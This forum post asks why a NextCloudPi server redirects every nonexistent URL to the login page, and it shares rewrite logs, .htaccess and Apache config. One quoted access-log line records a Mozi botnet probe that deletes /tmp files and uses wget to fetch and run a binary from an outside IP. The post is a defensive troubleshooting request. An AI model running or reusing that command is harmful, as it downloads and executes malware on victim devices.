Hello,
I’m running ncpi 1.25 with fail2ban and modsecurity enabled. After checking apache logs I saw a lot of scan and hacking attempts, which were coming to port 80 and redirected to 443, as by configuration in /etc/apache2/sites-available/000-default.conf.
localhost:80 128.14.134.134 - - [30/May/2020:17:30:54 +0200] “GET / HTTP/1.1” 302 447 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36”
localhost:80 116.114.95.100 - - [30/May/2020:18:06:16 +0200] “GET /shell?cd+/tmp;rm±rf+*;wget+http://116.114.95.100:35651/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1” 302 695 “-” “Hello, world”
l
So after disabling this rule (I’m accessing on https only), I realized that if I enter any URL (https://my-cloud.nsupdate.info/xxxx), it is always redirected to https://my-cloud.nsupdate.info/index.php/login.
I couldn’t find which redirect rule, either in apache configuration, or .htaccess in /var/www/nextcloud is doing this redirect.
My expecation is that error page 404 is displayed.
trace of rewrite log
[Mon Jun 08 08:45:43.225677 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.225822 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^$' to uri 'xxxx'
[Mon Jun 08 08:45:43.225858 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.225889 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '.*' to uri 'xxxx'
[Mon Jun 08 08:45:43.225937 2020] [rewrite:trace5] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] setting env variable 'HTTP_AUTHORIZATION' to ''
[Mon Jun 08 08:45:43.225999 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226057 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/host-meta' to uri 'xxxx'
[Mon Jun 08 08:45:43.226091 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226150 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/host-meta\\.json' to uri 'xxxx'
[Mon Jun 08 08:45:43.226183 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226213 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/webfinger' to uri 'xxxx'
[Mon Jun 08 08:45:43.226276 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226335 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/nodeinfo' to uri 'xxxx'
[Mon Jun 08 08:45:43.226367 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226501 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/carddav' to uri 'xxxx'
[Mon Jun 08 08:45:43.226536 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226565 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^\\.well-known/caldav' to uri 'xxxx'
[Mon Jun 08 08:45:43.226596 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226624 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^remote/(.*)' to uri 'xxxx'
[Mon Jun 08 08:45:43.226683 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226712 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^(?:build|tests|config|lib|3rdparty|templates)/.*' to uri 'xxxx'
[Mon Jun 08 08:45:43.226773 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/xxxx -> xxxx
[Mon Jun 08 08:45:43.226831 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] applying pattern '^(?:\\.|autotest|occ|issue|indie|db_|console).*' to uri 'xxxx'
[Mon Jun 08 08:45:43.226862 2020] [rewrite:trace1] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9a30a0/initial] [perdir /var/www/nextcloud/] pass through /var/www/nextcloud/xxxx
[Mon Jun 08 08:45:43.227114 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9489b0/initial/redir#1] [perdir /var/www/nextcloud/] strip per-dir prefix: /var/www/nextcloud/ ->
[Mon Jun 08 08:45:43.227176 2020] [rewrite:trace3] [pid 15620:tid 140177249679104] mod_rewrite.c(483): [client PUBLIC_IP:51725] PUBLIC_IP - - [my-cloud.nsupdate.info/sid#7f7d9b8c1888][rid#7f7d9b9489b0/initial/redir#1] [perdir /var/www/nextcloud/] applying pattern '^$' to uri ''
.htaccess in /var/www/nextcloud
<IfModule mod_headers.c>
<IfModule mod_setenvif.c>
<IfModule mod_fcgid.c>
SetEnvIfNoCase ^Authorization$ "(.+)" XAUTHORIZATION=$1
RequestHeader set XAuthorization %{XAUTHORIZATION}e env=XAUTHORIZATION
</IfModule>
<IfModule mod_proxy_fcgi.c>
SetEnvIfNoCase Authorization "(.+)" HTTP_AUTHORIZATION=$1
</IfModule>
</IfModule>
<IfModule mod_env.c>
# Add security and privacy related headers
Header always set Referrer-Policy "no-referrer"
Header always set X-Content-Type-Options "nosniff"
Header always set X-Download-Options "noopen"
Header always set X-Frame-Options "SAMEORIGIN"
Header always set X-Permitted-Cross-Domain-Policies "none"
Header always set X-Robots-Tag "none"
Header always set X-XSS-Protection "1; mode=block"
SetEnv modHeadersAvailable true
</IfModule>
# Add cache control for static resources
<FilesMatch "\.(css|js|svg|gif)$">
Header set Cache-Control "max-age=15778463"
</FilesMatch>
# Let browsers cache WOFF files for a week
<FilesMatch "\.woff2?$">
Header set Cache-Control "max-age=604800"
</FilesMatch>
</IfModule>
<IfModule mod_php7.c>
php_value mbstring.func_overload 0
php_value default_charset 'UTF-8'
php_value output_buffering 0
<IfModule mod_env.c>
SetEnv htaccessWorking true
</IfModule>
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} DavClnt
RewriteRule ^$ /remote.php/webdav/ [L,R=302]
RewriteRule .* - [env=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteRule ^\.well-known/host-meta /public.php?service=host-meta [QSA,L]
RewriteRule ^\.well-known/host-meta\.json /public.php?service=host-meta-json [QSA,L]
RewriteRule ^\.well-known/webfinger /public.php?service=webfinger [QSA,L]
RewriteRule ^\.well-known/nodeinfo /public.php?service=nodeinfo [QSA,L]
RewriteRule ^\.well-known/carddav /remote.php/dav/ [R=301,L]
RewriteRule ^\.well-known/caldav /remote.php/dav/ [R=301,L]
RewriteRule ^remote/(.*) remote.php [QSA,L]
RewriteRule ^(?:build|tests|config|lib|3rdparty|templates)/.* - [R=404,L]
RewriteCond %{REQUEST_URI} !^/\.well-known/(acme-challenge|pki-validation)/.*
RewriteRule ^(?:\.|autotest|occ|issue|indie|db_|console).* - [R=404,L]
</IfModule>
<IfModule mod_mime.c>
AddType image/svg+xml svg svgz
AddEncoding gzip svgz
</IfModule>
<IfModule mod_dir.c>
DirectoryIndex index.php index.html
</IfModule>
AddDefaultCharset utf-8
Options -Indexes
<IfModule pagespeed_module>
ModPagespeed Off
</IfModule>
#### DO NOT CHANGE ANYTHING ABOVE THIS LINE ####
ErrorDocument 403 /
ErrorDocument 404 /
/etc/apache2/sites-enabled/nextcloud.conf
<IfModule mod_ssl.c>
<VirtualHost _default_:443>
DocumentRoot /var/www/nextcloud
ServerName my-cloud.nsupdate.info
CustomLog /var/log/apache2/nc-access.log combined
ErrorLog /var/log/apache2/nc-error.log
SSLEngine on
SSLCertificateFile /etc/letsencrypt/live/my-cloud.nsupdate.info/fullchain.pem
SSLCertificateKeyFile /etc/letsencrypt/live/my-cloud.nsupdate.info/privkey.pem
SecRuleEngine On
</VirtualHost>
<Directory /var/www/nextcloud/>
Options +FollowSymlinks
AllowOverride All
<IfModule mod_dav.c>
Dav off
</IfModule>
LimitRequestBody 0
SSLRenegBufferSize 10486000
</Directory>
</IfModule>
Some of these scans were finally blocked by fail2ban via “apache-postflood”. My modsecurity rules were probably not correctly set at that time, which could explain why they were not blocked sooner by modsecurity.
Is the current behaviour normal - should any non-existent page be redirected to index.php/login ?
If not, how can it be changed?